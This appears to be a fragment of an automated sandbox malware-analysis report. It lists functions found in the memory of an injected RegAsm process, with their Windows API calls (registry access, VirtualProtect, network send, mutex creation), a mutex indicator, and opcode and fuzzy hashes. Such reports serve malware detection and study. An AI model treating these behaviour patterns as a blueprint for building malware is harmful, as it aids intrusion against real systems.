                                                                                                                                                                                                  Function 0044EE44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID: $t'`/
                                                                                                                                                                                                  • API String ID: 1807457897-4170477578
                                                                                                                                                                                                  • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                                                  • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                                                                                                                  Function 0044854A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2279764990-2084328917
                                                                                                                                                                                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                                                                  Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                  • String ID: LCMapStringEx$t'`/
                                                                                                                                                                                                  • API String ID: 2568140703-4134516538
                                                                                                                                                                                                  • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                                                  • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                                                                                                                  Function 00448B04 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                  • String ID: InitializeCriticalSectionEx$t'`/
                                                                                                                                                                                                  • API String ID: 2593887523-4092494707
                                                                                                                                                                                                  • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                                                                                  • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                                                                                                                  Function 00448790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Alloc
                                                                                                                                                                                                  • String ID: FlsAlloc$t'`/
                                                                                                                                                                                                  • API String ID: 2773662609-3463628561
                                                                                                                                                                                                  • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                                                  • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                                                                                                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                  • String ID: Rmc-EPF38I
                                                                                                                                                                                                  • API String ID: 1925916568-3825396231
                                                                                                                                                                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                                                                                  Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2905821283-0
                                                                                                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                  • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                                  Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3963590051-0
                                                                                                                                                                                                  • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                                                  • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                                                                                  Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3519776433-0
                                                                                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                  • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                                  Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                                                                                  Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                                                                                  Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                                                                                  Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                                                                                  Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1818849710-0
                                                                                                                                                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                                                                                                                  Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                                                                                  • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                  • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                                                                                  Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                  • String ID: pQG
                                                                                                                                                                                                  • API String ID: 176396367-3769108836
                                                                                                                                                                                                  • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                                                                                                                  Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
